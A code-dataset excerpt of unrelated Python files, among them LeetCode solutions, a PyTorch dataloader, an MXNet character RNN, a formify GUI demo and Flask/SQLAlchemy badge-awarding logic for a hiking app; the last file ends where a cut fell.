eb36a6f1a71f7abbca5ef7d2cd9ef1f6e6c71994 | Python | hyejinHong0602/BOJ | /bronze3/[WEEK1] 10951 - A + B - 4.py | UTF-8 | 365 | 3.421875 | 3 | [] | no_license | # 이렇게 하면 런타임에러남.
# Broken first attempt (the original Korean note said it causes a runtime
# error): input() is unguarded, so it raises at end of input. Kept for study.
while True:
    a, b = map(int, input().split())
    if (a>0 and b < 10):
        print(a+b)
    else:
        break
# The end of input is unspecified, so EOF has to be handled with try/except
# (translated from the original Korean comment).
while True:
    try:
        a, b = map(int, input().split())
        print(a+b)
    except:
        break
3891c93bb99059d35a4082ef467073fdb99d62ec | Python | joker-xidian/espcn-1 | /dataloader.py | UTF-8 | 1,388 | 2.671875 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Time : 2019/2/8 11:39
# @Author : ylin
# Description:
#
from torch.utils.data.dataset import Dataset
from os.path import join
from os import listdir
from PIL import Image
def is_image_file(filename):
    """Return True for .png/.jpg/.jpeg files, case-insensitively.

    Generalized from an explicit list of lower/upper-case suffixes, so
    mixed-case names such as 'photo.Jpg' are now accepted as well.
    """
    return filename.lower().endswith(('.png', '.jpg', '.jpeg'))
class DatasetFromFolder(Dataset):
    """Paired image dataset: X4/ holds inputs, HR/ holds targets.

    NOTE(review): dataset_dir is concatenated directly with 'X4/'/'HR/',
    so it must already end with a path separator -- confirm at call sites.
    """
    def __init__(self, dataset_dir, input_transform=None, target_transform=None):
        super(DatasetFromFolder, self).__init__()
        self.image_dir = dataset_dir + 'X4/'
        self.target_dir = dataset_dir + 'HR/'
        self.image_filenames = [join(self.image_dir, x) for x in listdir(self.image_dir) if is_image_file(x)]
        self.target_filenames = [join(self.target_dir, x) for x in listdir(self.target_dir) if is_image_file(x)]
        self.input_transform = input_transform
        self.target_transform = target_transform
    def __getitem__(self, index):
        # Pairing relies on the listdir order of the two folders matching.
        image = Image.open(self.image_filenames[index]).convert('RGB')
        target = Image.open(self.target_filenames[index]).convert('RGB')
        if self.input_transform:
            image = self.input_transform(image)
        if self.target_transform:
            target = self.target_transform(target)
        return image, target
    def __len__(self):
        return len(self.image_filenames)
| true |
417abe05ed76361a5b6ca8f7729855d7777f9a86 | Python | crazywiden/Leetcode_daily_submit | /Widen/LC457_Circular_Array_Loop.py | UTF-8 | 3,553 | 3.90625 | 4 | [
"MIT"
] | permissive | """
LC 457 -- Circular Array Loop
You are given a circular array nums of positive and negative integers. If a number k at an index is positive,
then move forward k steps. Conversely, if it's negative (-k), move backward k steps. Since the array is circular,
you may assume that the last element's next element is the first element,
and the first element's previous element is the last element.
Determine if there is a loop (or a cycle) in nums.
A cycle must start and end at the same index and the cycle's length > 1.
Furthermore, movements in a cycle must all follow a single direction.
In other words, a cycle must not consist of both forward and backward movements.
Example 1:
Input: [2,-1,1,2,2]
Output: true
Explanation: There is a cycle, from index 0 -> 2 -> 3 -> 0. The cycle's length is 3.
Example 2:
Input: [-1,2]
Output: false
Explanation: The movement from index 1 -> 1 -> 1 ... is not a cycle,
because the cycle's length is 1. By definition the cycle's length must be greater than 1.
Example 3:
Input: [-2,1,-1,-2,-2]
Output: false
Explanation: The movement from index 1 -> 2 -> 1 -> ... is not a cycle,
because movement from index 1 -> 2 is a forward movement, but movement from index 2 -> 1 is a backward movement.
All movements in a cycle must follow a single direction.
"""
# naive method -- traverse all element one by one
# time complexity -- O(N^2)
# space complexity -- O(N)
# Runtime: 596 ms, faster than 24.03% of Python3 online submissions for Circular Array Loop.
# Memory Usage: 14 MB, less than 100.00% of Python3 online submissions for Circular Array Loop.
class Solution:
    def circularArrayLoop(self, nums: List[int]) -> bool:
        """Return True if nums contains a single-direction cycle of length > 1.

        Naive O(N^2) approach: walk from every start index, tracking the
        visited indices, and stop on a direction change or a revisit.
        """
        N = len(nums)

        def helper(init):
            # Walk from `init`; True iff the walk closes a valid cycle.
            visited_idx = {init}
            curr_idx = init
            # Python's % already maps negative sums into [0, N), so one
            # expression covers both directions.  (The original branched on
            # sign and computed N - abs(x) % N, which produces the
            # out-of-range index N whenever x is a negative multiple of N,
            # e.g. nums = [-2, -2] raised IndexError.)
            next_idx = (curr_idx + nums[curr_idx]) % N
            while next_idx not in visited_idx:
                visited_idx.add(next_idx)
                if nums[next_idx] * nums[init] < 0:
                    return False  # direction changed mid-walk
                curr_idx = next_idx
                next_idx = (curr_idx + nums[curr_idx]) % N
            if len(visited_idx) == 1:
                return False      # immediate self-loop at init
            if curr_idx == next_idx:
                return False      # closing step is a length-1 self-loop
            return True

        if N == 1:
            return False
        for i in range(N):
            if helper(i):
                return True
        return False
# method2 -- two pointers
class Solution:
    def circularArrayLoop(self, nums: List[int]) -> bool:
        """Detect a single-direction cycle of length > 1 in the circular array.

        Indices proven cycle-free are flagged in `seen`, so every index is
        explored at most once and the traversal is O(N) overall.
        """
        size = len(nums)
        seen = [False] * size
        for start in range(size):
            if seen[start] or nums[start] == 0:
                continue  # already ruled out, or a zero step (self-loop)
            walk = set()
            sign = nums[start] // abs(nums[start])  # +1 forward, -1 backward
            cur = start
            while True:
                nxt = (cur + nums[cur]) % size
                if nxt in walk:
                    return True  # closed a cycle of length >= 2
                walk.add(cur)
                # Stop on a self-loop, a direction flip, or a known dead end.
                if nxt == cur or sign * nums[nxt] <= 0 or seen[nxt]:
                    break
                cur = nxt
            for idx in walk:
                seen[idx] = True
        return False
| true |
4be5d71a17cf8b25c1de2ee84d189bfee5a5832d | Python | benjaminknebusch/formify | /first_app.py | UTF-8 | 664 | 2.734375 | 3 | [] | no_license | from formify.layout import *
from formify.controls import *
import formify
def print_text():
    """Show the form's current text either in an OK dialog or on stdout."""
    text = ui.value["text"]
    dialog_requested = ui.value["print_mode"] == "Dialog"
    if dialog_requested:
        formify.tools.ok_dialog("Text:", text)
    else:
        print(text)
def set_value():
    """Reset the whole form to a canned example state."""
    example_state = {'text': 'Moin GUI Runde ', 'print_mode': 'Dialog'}
    ui.value = example_state
# Layout: a text box plus mode selector on one row, the action button below.
input_row = Row(
    ControlText(variable_name="text", value="Print this text"),
    ControlCombo("Mode", items=["Dialog", "Print"], variable_name="print_mode"),
)
ui = Form(Col(
    input_row,
    ControlButton("print or show dialog", on_click=print_text),
))

# Menu bar: one entry bound to the same handler, with a keyboard shortcut.
menu = {
    "Print Menu": {
        "print / show dialog": (print_text, "ctrl+p"),
    }
}
formify.MainWindow(ui, menu=menu, margin=8) | true |
85f70c757d0bedbc594bf888558f174b9fed2dcf | Python | cesarschool/cesar-school-fp-2018-2-lista2-JonathasBarreto | /questoes/questao_2.py | UTF-8 | 1,998 | 3.9375 | 4 | [] | no_license | ## QUESTÃO 2 ##
#
# Um robô se move em um plano a partir do ponto original (0,0). O robô pode se
# mover nas direções CIMA, BAIXO, ESQUERDA e DIREITA de acordo com um
# passo fornecido. O traço do movimento do robô é mostrado da seguinte forma:
#
# CIMA 5
# BAIXO 3
# ESQUERDA 3
# DIREITA 2
#
# Os números após a direção são passos.
# Escreva um programa para calcular a distância entre a posição atual e o
# ponto original após uma seqüência de movimentos. Se a distância for um
# float, basta imprimir o inteiro mais próximo.
# Exemplo:
# Se as seguintes tuplas são dadas como entrada para o programa:
#
# CIMA 5
# BAIXO 3
# ESQUERDA 3
# DIREITA 2
#
# Então, a saída do programa deve ser:
# 2
#
# Dicas:
# As entradas devem ser lidas do console até que um valor vazio seja digitado.
# A saída deve ser um inteiro que representa a distancia para o ponto original.
# Entradas inválidas devem ser descartadas da contagem.
##
##
# A sua resposta da questão deve ser desenvolvida dentro da função main()!!!
# Deve-se substituir o comando print existente pelo código da solução.
# Para a correta execução do programa, a estrutura atual deve ser mantida,
# substituindo apenas o comando print(questão...) existente.
##
def main():
    """Read movement commands from stdin and print the distance to the origin.

    Lines look like "CIMA 5" (direction + step count); reading stops at the
    first empty line.  Directions: CIMA (up), BAIXO (down), ESQUERDA (left),
    DIREITA (right).  Invalid lines are discarded, as the exercise requires.
    The distance is printed as the *nearest* integer (round, not int()
    truncation, since the statement asks for "o inteiro mais próximo").
    The template's placeholder print("questao 2") is removed, per the file
    header's instruction to replace it with the solution.
    """
    from math import hypot

    steps = {'CIMA': 0, 'BAIXO': 0, 'ESQUERDA': 0, 'DIREITA': 0}
    entrada = input().upper()
    while entrada:
        parts = entrada.split()
        # Discard anything that is not "<known direction> <integer>".
        if len(parts) == 2 and parts[0] in steps:
            try:
                steps[parts[0]] += int(parts[1])
            except ValueError:
                pass  # non-numeric step count: invalid line, skip it
        entrada = input().upper()

    vertical = steps['CIMA'] - steps['BAIXO']
    horizontal = steps['DIREITA'] - steps['ESQUERDA']
    # With no (valid) input at all the distance is simply 0; the original
    # raised NameError because H was only assigned inside the loop.
    print(int(round(hypot(horizontal, vertical))))
# Run only when executed as a script, not when imported as a module.
if __name__ == '__main__':
    main()
| true |
db6917f1d8d2dea5f7d2c4b6a74c24c69308b444 | Python | sanlingdd/NN | /MXNETDeepLearning/RNNTimeMachine.py | UTF-8 | 4,288 | 2.703125 | 3 | [] | no_license | # coding=utf-8
import sys
sys.path.append('..')
from mxnet import ndarray as nd
import re
# Load the full text corpus that the character-level RNN will model.
with open("data/timemachine.txt") as f:
    time_machine = f.read()
def getWords(string):
    """Lower-case *string*, strip line breaks, and split it into tokens.

    re.split with a capturing group keeps the delimiters, so punctuation and
    spaces come back as their own tokens alongside the words.
    """
    # Raw strings fix the invalid escape sequences '\W' and '\s' that modern
    # Python warns about, without changing the bytes matched/replaced.
    # NOTE(review): replacing the literal two-character sequence backslash-s
    # is almost certainly a regex-whitespace-strip confusion; it is kept
    # as-is because actually removing spaces would merge adjacent words
    # into single tokens downstream -- confirm intent before changing.
    eraseString = string.lower().replace('\n', '').replace('\r', '').replace(r'\s', '')
    return re.split(r'(\W)', eraseString)
# Tokenise the corpus and build the token <-> index vocabulary tables.
time_machine = getWords(time_machine)
# NOTE(review): set() iteration order varies between runs (hash
# randomisation), so the learned token indices are not reproducible.
character_list = list(set(time_machine))
# Dict comprehension instead of dict([...]) -- same mapping, clearer.
character_dict = {char: i for i, char in enumerate(character_list)}
vocab_size = len(character_dict)
print('vocab size:', vocab_size)
time_numerical = [character_dict[char] for char in time_machine]
import random
from mxnet import nd
def data_iter(batch_size, seq_len, ctx=None):
    """Yield (data, label) minibatches of random length-`seq_len` slices.

    Labels are the inputs shifted one token to the right, as usual for
    next-token language modelling.
    """
    num_examples = (len(time_numerical) - 1) // seq_len
    num_batches = num_examples // batch_size
    # Shuffle example order so consecutive batches are not adjacent text.
    idx = list(range(num_examples))
    random.shuffle(idx)

    # Slice of seq_len tokens starting at corpus position pos.
    def _data(pos):
        return time_numerical[pos:pos + seq_len]

    for i in range(num_batches):
        # Take batch_size *disjoint* example indices per batch.  The
        # original used idx[i:i+batch_size], i.e. overlapping windows that
        # mostly repeated the same examples and never covered the corpus.
        examples = idx[i * batch_size:(i + 1) * batch_size]
        data = nd.array(
            [_data(j * seq_len) for j in examples], ctx=ctx)
        label = nd.array(
            [_data(j * seq_len + 1) for j in examples], ctx=ctx)
        yield data, label
import mxnet as mx
# Pick the compute context: GPU when available, otherwise CPU.
import sys
sys.path.append('..')  # NOTE(review): duplicates the append at the top of the file
import utils
ctx = utils.try_gpu()
print('Will use ', ctx)
num_hidden = 256
weight_scale = .01
# Hidden-layer parameters: input->hidden, hidden->hidden weights, hidden bias.
Wxh = nd.random_normal(shape=(vocab_size,num_hidden), ctx=ctx) * weight_scale
Whh = nd.random_normal(shape=(num_hidden,num_hidden), ctx=ctx) * weight_scale
bh = nd.zeros(num_hidden, ctx=ctx)
# Output-layer parameters: hidden->vocab projection and bias.
Why = nd.random_normal(shape=(num_hidden,vocab_size), ctx=ctx) * weight_scale
by = nd.zeros(vocab_size, ctx=ctx)
params = [Wxh, Whh, bh, Why, by]
for param in params:
    param.attach_grad()  # allocate gradient buffers for autograd
def get_inputs(data):
    """One-hot encode each time step: (batch, seq) -> seq list of (batch, vocab)."""
    return [nd.one_hot(step, vocab_size) for step in data.T]
def rnn(inputs, H):
    """Run the vanilla RNN over one sequence.

    inputs -- list (length seq_len) of (batch_size, vocab_size) one-hot arrays
    H      -- (batch_size, num_hidden) initial hidden state
    Returns (outputs, H): per-step (batch_size, vocab_size) logits and the
    final hidden state.
    """
    outputs = []
    for step_input in inputs:
        # h_t = tanh(x_t W_xh + h_{t-1} W_hh + b_h)
        H = nd.tanh(nd.dot(step_input, Wxh) + nd.dot(H, Whh) + bh)
        # y_t = h_t W_hy + b_y
        step_output = nd.dot(H, Why) + by
        outputs.append(step_output)
    return (outputs, H)
def predict(prefix, num_chars):
    """Generate `num_chars` further tokens after warm-starting on `prefix`."""
    prefix = getWords(prefix)
    state = nd.zeros(shape=(1, num_hidden), ctx=ctx)
    output = [character_dict[prefix[0]]]
    for i in range(num_chars+len(prefix)):
        # Feed the most recent token back in as the next input.
        X = nd.array([output[-1]], ctx=ctx)
        Y, state = rnn(get_inputs(X), state)
        if i < len(prefix)-1:
            # Still consuming the prefix: force-feed the known next token.
            next_input = character_dict[prefix[i+1]]
        else:
            # Past the prefix: greedily take the highest-scoring token.
            next_input = int(Y[0].argmax(axis=1).asscalar())
        output.append(next_input)
    return ''.join([character_list[i] for i in output])
def grad_clipping(params, theta):
    """Scale every gradient in place so the global L2 norm is at most theta."""
    squared_sum = nd.array([0.0], ctx)
    for param in params:
        squared_sum += nd.sum(param.grad ** 2)
    global_norm = nd.sqrt(squared_sum).asscalar()
    if global_norm > theta:
        scale = theta / global_norm
        for param in params:
            param.grad[:] *= scale
from mxnet import autograd
from mxnet import gluon
from math import exp
# Training hyper-parameters.
epochs = 200
seq_len = 35
learning_rate = .1
batch_size = 32
softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
for e in range(epochs+1):
    train_loss, num_examples = 0, 0
    # Fresh zero hidden state at the start of every epoch.
    state = nd.zeros(shape=(batch_size, num_hidden), ctx=ctx)
    for data, label in data_iter(batch_size, seq_len, ctx):
        with autograd.record():
            outputs, state = rnn(get_inputs(data), state)
            # reshape label to (batch_size*seq_len, )
            # concatenate outputs to (batch_size*seq_len, vocab_size)
            label = label.T.reshape((-1,))
            outputs = nd.concat(*outputs, dim=0)
            loss = softmax_cross_entropy(outputs, label)
        loss.backward()
        grad_clipping(params, 5)  # guard against exploding gradients
        utils.SGD(params, learning_rate)
        train_loss += nd.sum(loss).asscalar()
        num_examples += loss.size
    if e % 20 == 0:
        # Report perplexity and two sample generations.
        print("Epoch %d. PPL %f" % (e, exp(train_loss/num_examples)))
        print(' - ', predict('The Time ', 100))
        print(' - ', predict("The Medical Man rose, came to the lamp,", 100), '\n')
| true |
d43e78e72c091203d55dc52342fb89d40ea6ee5d | Python | gracechang1002/Leetcode_python | /001~200/0067. Add Binary.py | UTF-8 | 182 | 3.125 | 3 | [] | no_license | class Solution:
    def addBinary(self, a: str, b: str) -> str:
        """Return the binary-string sum of binary strings `a` and `b`."""
        a_int = int(a,2)
        b_int = int(b,2)
        # bin() prefixes '0b'; slicing [2:] leaves the bare digits.
        output = bin(a_int+b_int)[2:]
return output | true |
e34ce072bf28aec3f48d312c161a76d96f23a740 | Python | wemstar/EksploracjaDanych | /Lab1/Zadanie1.py | UTF-8 | 971 | 2.953125 | 3 | [] | no_license | __author__ = 'wemstar'
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def filterMethodOne(list, axis):
    """Return the rows whose `axis`-th column is a 3-sigma outlier.

    Prints the column mean and standard deviation as a side effect.
    (The parameter name `list` shadows the builtin but is kept for
    compatibility with keyword callers.)
    """
    column = list[:, axis]
    center = np.mean(column)
    spread = np.std(column)
    print("{0} {1}".format(center, spread))
    return list[abs(column - center) > 3.0 * spread]
# Load the Haberman data (CSV rows: age, year, nodes, class) into an array.
data = []
with open("haberman.data", "r") as file:  # `with` closes the handle; the original leaked it
    for x in file:
        line = [int(value) for value in x.split(',')]
        data.append(line)
data = np.array(data)

# Split the rows by the class label in column 3 (values 1 and 2).
data_group1 = data[data[:, 3] == 1]
data_group2 = data[data[:, 3] == 2]

# 3-D scatter plot of the two groups (red circles vs. blue crosses).
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(data_group1[:, 0], data_group1[:, 1], data_group1[:, 2], c='r', marker='o')
ax.scatter(data_group2[:, 0], data_group2[:, 1], data_group2[:, 2], c='b', marker='x')
ax.set_xlabel('Wiek')
ax.set_ylabel('Rok')
ax.set_zlabel('Węzły')

# Report the 3-sigma outliers of each feature column.
print("Kolumna 1")
print(filterMethodOne(data, 0))
print("Kolumna 2")
print(filterMethodOne(data, 1))
print("Kolumna 3")
print(filterMethodOne(data, 2))
#plt.show()
| true |
1e5c91f64f39b71293e1d095ccd25db0b3e3566f | Python | allamberto/CSE20289-Assignments | /reading04/head2.py | UTF-8 | 894 | 3.03125 | 3 | [] | no_license | #!/usr/bin/env python3
import os
import sys
# Global Variables
ENDING = ''  # NOTE(review): defined but never used anywhere in this script
# Usage function
def usage(status=0):
    """Print a usage message naming the real program, then exit with `status`."""
    # The original template hard-coded "head.py" while passing
    # basename(argv[0]) to .format() with no placeholder to receive it,
    # so the argument was silently ignored.  {} restores the intent.
    print('''Usage: {} files...

    -n NUM      print the first NUM lines instead of the first 10'''.format(os.path.basename(sys.argv[0])))
    sys.exit(status)
# Parse command line options
NUM = 10
count = 0
args = sys.argv[1:]
while len(args) and args[0].startswith('-') and len(args[0]) > 1:
    arg = args.pop(0)
    if arg == '-n':
        # NOTE(review): NUM becomes a *string* here (it is converted with
        # int() in the read loop); "-n" with no value raises IndexError and
        # a non-numeric value fails later -- consider validating here.
        NUM = args.pop(0)
    elif arg == '-h':
        usage(0)
    else:
        usage(1)
if len(args) == 0:
    args.append('-')  # no file arguments: read from stdin
# Main execution
for path in args:
    if path == '-':
        stream = sys.stdin
    else:
        stream = open(path)
    for line in stream:
        # `count` is never reset per file, so at most NUM lines are printed
        # in *total* across all files (GNU head prints NUM per file --
        # confirm which behaviour is intended).
        if count == int(NUM):
            # NOTE(review): exiting here skips stream.close() below.
            sys.exit(0)
        line = line.rstrip()
        print(line)
        count = count + 1
    stream.close()  # NOTE(review): also closes sys.stdin when path == '-'
| true |
bd98f1c22c08ea693d6eed20fdd85b161cda81b0 | Python | lychengrex/Bird-Species-Classification-Using-Transfer-Learning | /src/utils.py | UTF-8 | 2,431 | 2.984375 | 3 | [
"MIT"
] | permissive | import numpy as np
import matplotlib.pyplot as plt
import nntools as nt
import torch
from torch import nn
class NNClassifier(nt.NeuralNetwork):
    """Neural network specialised for classification.

    Fixes the training criterion of nt.NeuralNetwork to cross-entropy,
    the natural loss for networks that emit per-class scores.
    """

    def __init__(self):
        super().__init__()  # Python-3 zero-argument super, same semantics
        self.cross_entropy = nn.CrossEntropyLoss()

    def criterion(self, y, d):
        """Cross-entropy between predicted scores `y` and target labels `d`."""
        return self.cross_entropy(y, d)
class ClassificationStatsManager(nt.StatsManager):
    """Stats manager that tracks classification accuracy alongside the loss."""

    def __init__(self):
        super().__init__()

    def init(self):
        """Reset the accumulated statistics."""
        super().init()
        self.running_accuracy = 0

    def accumulate(self, loss, x, y, d):
        """Fold one minibatch into the running statistics."""
        super().accumulate(loss, x, y, d)
        _, predicted = torch.max(y, 1)  # index of the top score per sample
        self.running_accuracy += torch.mean((predicted == d).float())

    def summarize(self):
        """Return the averaged loss and the accuracy in percent."""
        mean_loss = super().summarize()
        accuracy = 100 * self.running_accuracy / self.number_update
        return {'loss': mean_loss, 'accuracy': accuracy}
def imshow(image, ax=plt):
    """Display a CHW tensor with values in [-1, 1]; returns the image handle."""
    array = image.to('cpu').numpy()
    # CHW -> HWC, the layout matplotlib expects.
    array = np.moveaxis(array, [0, 1, 2], [2, 0, 1])
    # Map [-1, 1] to [0, 1] and clamp anything that falls outside.
    array = np.clip((array + 1) / 2, 0, 1)
    handle = ax.imshow(array)
    ax.axis('off')
    return handle
def plot(exp, fig, axes):
    """Redraw loss (axes[0]) and accuracy (axes[1]) curves for experiment `exp`.

    exp.history[k] appears to be a (train_stats, eval_stats) pair of dicts
    with 'loss' and 'accuracy' keys -- TODO confirm against nntools.
    """
    axes[0].clear()
    axes[1].clear()
    # training loss
    axes[0].plot([exp.history[k][0]['loss'] for k in range(exp.epoch)],
                 label="training loss")
    # evaluation loss
    axes[0].plot([exp.history[k][1]['loss'] for k in range(exp.epoch)],
                 label="evaluation loss")
    axes[0].set_xlabel('Epoch')
    axes[0].set_ylabel('Loss')
    axes[0].legend(('training loss', 'evaluation loss'))
    # training accuracy
    axes[1].plot([exp.history[k][0]['accuracy'] for k in range(exp.epoch)],
                 label="training accuracy")
    # evaluation accuracy
    axes[1].plot([exp.history[k][1]['accuracy'] for k in range(exp.epoch)],
                 label="evaluation accuracy")
    axes[1].set_xlabel('Epoch')
    axes[1].set_ylabel('Accuracy')
    axes[1].legend(('training accuracy', 'evaluation accuracy'),
                   loc='lower right')
    plt.tight_layout()
    fig.canvas.draw()
| true |
1eee840ebe063ce8dfdbe1f9712c2ce8f2969c7a | Python | jer321/DK-Project | /DATA/Princess.py | UTF-8 | 490 | 2.953125 | 3 | [] | no_license | #Princesa
__Author__='Juan Fernando Otoya'
import pygame as pig
import os
class princesa():
def __init__(self,pos=(0,0),size=(45,62)):
self.rect=pig.Rect(pos,size)
self.img=pig.image.load(os.path.join('IMG','princess.png'))
self.img=pig.transform.scale(self.img,size)
    def update(self,player):
        # Win test: either vertical edge of the princess lies strictly inside
        # the player's horizontal span, AND the princess's centre height lies
        # strictly inside the player's vertical span (partial-overlap touch).
        if ((player.rect.right>self.rect.right>player.rect.left)\
            or (player.rect.right>self.rect.left>player.rect.left))\
            and player.rect.bottom>self.rect.centery>player.rect.top:
player.win=True | true |
c508eb9f0ff218b778cd89bf6436108ef4732be6 | Python | mateusgruener/cursopython | /Capítulos/6/exercício 6.1.py | UTF-8 | 242 | 3.46875 | 3 | [] | no_license | #exercício 6.1
from matplotlib.pyplot import *
import numpy as np
# Parametric curve x = a*cos(t) + b*sin(t), y = -a*sin(t) + b*cos(t).
# Since x^2 + y^2 = a^2 + b^2 = 25, this traces a circle of radius 5
# once as t runs over [-pi, pi], drawn with red star markers.
a=3
b=4
theta = np.linspace( -1 * np.pi, np.pi, 200)
x= a*np.cos(theta) + b*np.sin(theta)
y= -1 * a* np.sin(theta) + b*np.cos(theta)
plot(x,y, "r*")
show()
| true |
dd79a537ea52a775adf2cdd78e52536937c8948a | Python | sarah-young/Trail-Quest-1.0 | /functions.py | UTF-8 | 18,812 | 2.53125 | 3 | [] | no_license | """Functions for Trail Quest"""
import secrets
import requests
import random
import model
import password_hashing
from flask import Flask, session, jsonify
hp_api_key = secrets.HIKING_PROJECT_API_KEY
#db = SQLAlchemy()
def find_badges():
    """Return the Badge rows earned by the logged-in user."""
    user_merits = model.db.session.query(model.Merit).filter(
        model.Merit.user_id == session['user_id']).all()
    # set() drops any duplicate Merit rows before resolving them to badges.
    unique_merits = list(set(user_merits))
    earned_badges = []
    for merit in unique_merits:
        # NOTE(review): one query per merit (N+1 pattern); a join would do.
        badge = model.db.session.query(model.Badge).filter(
            model.Badge.badge_name == merit.badges.badge_name).first()
        earned_badges.append(badge)
    return earned_badges
def find_uncompleted_trails():
"""Find completed trails"""
print "**IN UNCOMPLETED TRAILS FUNC***"
# SET MATH
# use session to get user_id
# query to find all user's trails
all_users_trails = model.db.session.query(model.Trek).filter(model.Trek.user_id==session['user_id']).all()
# guery to find all user's reviews
all_users_reviews = model.db.session.query(model.Review).filter(model.Review.user_id==session['user_id']).all()
# loop through each list & extract trail ids
ids_from_trail_lst = []
for trail in all_users_trails:
ids_from_trail_lst.append(trail.trail_id)
trail_lst_set = set(ids_from_trail_lst)
ids_from_trail_rvws =[]
for trail in all_users_reviews:
ids_from_trail_rvws.append(trail.trail_id)
completed_trails_set = set(ids_from_trail_rvws)
uncompleted_trails = set(ids_from_trail_lst) - set(ids_from_trail_rvws)
# completed_trail_ob_lst = []
# for c_trail in completed_trails_set:
# trail_object = model.db.session.query(model.Trail).filter(model.Trail.trail_id==c_trail).first()
# completed_trail_ob_lst.append(trail_object)
uncompleted_trail_ob_lst = []
for uc_trail in uncompleted_trails:
trail_object = model.db.session.query(model.Trail).filter(model.Trail.trail_id==uc_trail).first()
uncompleted_trail_ob_lst.append(trail_object)
return [uncompleted_trail_ob_lst, all_users_reviews]
def load_badges():
"""Create badges"""
for i, row in enumerate(open("badge_seed_data.csv")):
row = row.rstrip()
badge_name, badge_description = row.split(",")
badge = model.Badge(badge_name=badge_name,
badge_description=badge_description)
# We need to add to the session or it won't ever be stored
model.db.session.add(badge)
# provide some sense of progress
if i % 100 == 0:
print i
model.db.session.commit()
print "Completed."
def add_badge_if_applicable(t_id):
"""
When review is posted, check to see if badge should be added to user page.
user_id = db.Column(db.Integer, db.ForeignKey('users.user_id'))
badge_id = db.Column(db.Integer, db.ForeignKey('badges.badge_id'))
merit_date = db.Column(db.DateTime)
badges = db.relationship('Badge')
users = db.relationship('User')
"""
# Run query for all badges that are owned by a user
# Run only queries for badges that the user doesn't have
trail = model.db.session.query(model.Trail).filter(model.Trail.trail_id==t_id).first()
print trail
if 'waterfall' in trail.trail_description or 'water fall' in trail.trail_description:
b_id = 1
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
waterfall_merit = model.Merit(user_id = session['user_id'],
badge_id = 1)
model.db.session.add(waterfall_merit)
print 'waterfall'
if 'marmot' in trail.trail_description or 'marmots' in trail.trail_description:
b_id = 15
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
marmot_merit = model.Merit(user_id = session['user_id'],
badge_id = 15)
model.db.session.add(marmot_merit)
if 'creek' in trail.trail_description:
b_id = 2
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
creek_merit = model.Merit(user_id = session['user_id'],
badge_id = 2)
model.db.session.add(creek_merit)
if "river" in trail.trail_description:
b_id = 3
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
river_merit = model.Merit(user_id = session['user_id'],
badge_id = 3)
model.db.session.add(river_merit)
if "outlook" in trail.trail_description:
b_id = 4
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
outlook_merit = model.Merit(user_id = session['user_id'],
badge_id = 4)
model.db.session.add(outlook_merit)
if int(trail.trail_high_alt) - int(trail.trail_low_alt) > 500:
b_id = 5
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
altitude_merit = model.Merit(user_id = session['user_id'],
badge_id = 5)
model.db.session.add(altitude_merit)
if "redwood" in trail.trail_description or "redwoods" in trail.trail_description:
b_id = 6
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
redwood_merit = model.Merit(user_id = session['user_id'],
badge_id = 6)
model.db.session.add(redwood_merit)
if "fern" in trail.trail_description:
b_id = 7
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
fern_merit = model.Merit(user_id = session['user_id'],
badge_id = 7)
model.db.session.add(fern_merit)
if "wild flower" in trail.trail_description or "wildflower" in trail.trail_description:
b_id = 8
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
wildflower_merit = model.Merit(user_id = session['user_id'],
badge_id = 8)
model.db.session.add(wildflower_merit)
if "meadow" in trail.trail_description:
b_id = 9
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
meadow_merit = model.Merit(user_id = session['user_id'],
badge_id = 9)
model.db.session.add(meadow_merit)
if "mountain" in trail.trail_description or "Mountain" in trail.trail_description:
b_id = 10
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
mountain_merit = model.Merit(user_id = session['user_id'],
badge_id = 10)
model.db.session.add(mountain_merit)
if "deer" in trail.trail_description:
b_id = 11
badge_ownership_check = model.db.session.query(model.Merit).filter(model.Merit.badge_id==b_id, model.Merit.user_id==session['user_id']).first()
if badge_ownership_check == None:
merit = model.Merit(user_id = session['user_id'],
badge_id = 11)
model.db.session.add(merit)
trek_check = model.db.session.query(model.Trek).filter(model.Trek.user_id==session['user_id']).all()
if len(trek_check) > 0:
trailhead_merit = model.Merit(user_id = session['user_id'],
badge_id = 14)
model.db.session.add(trailhead_merit)
review_check = model.db.session.query(model.Review).filter(model.Review.user_id==session['user_id']).all()
if len(review_check) > 0:
first_trek_merit = model.Merit(user_id = session['user_id'],
badge_id = 12)
model.db.session.add(first_trek_merit)
if len(review_check) > 4:
high_5_merit = model.Merit(user_id = session['user_id'],
badge_id = 13)
model.db.session.add(high_5_merit)
model.db.session.commit()
def add_review_to_db(review_text, user_id, t_id):
""" Add review from user to DB """
review_check = model.db.session.query(model.Review).filter(model.Review.user_id==user_id, model.Review.trail_id==t_id).first()
if review_check == None:
review = model.Review(user_id = user_id,
trail_id = t_id,
review_text = review_text)
model.db.session.add(review)
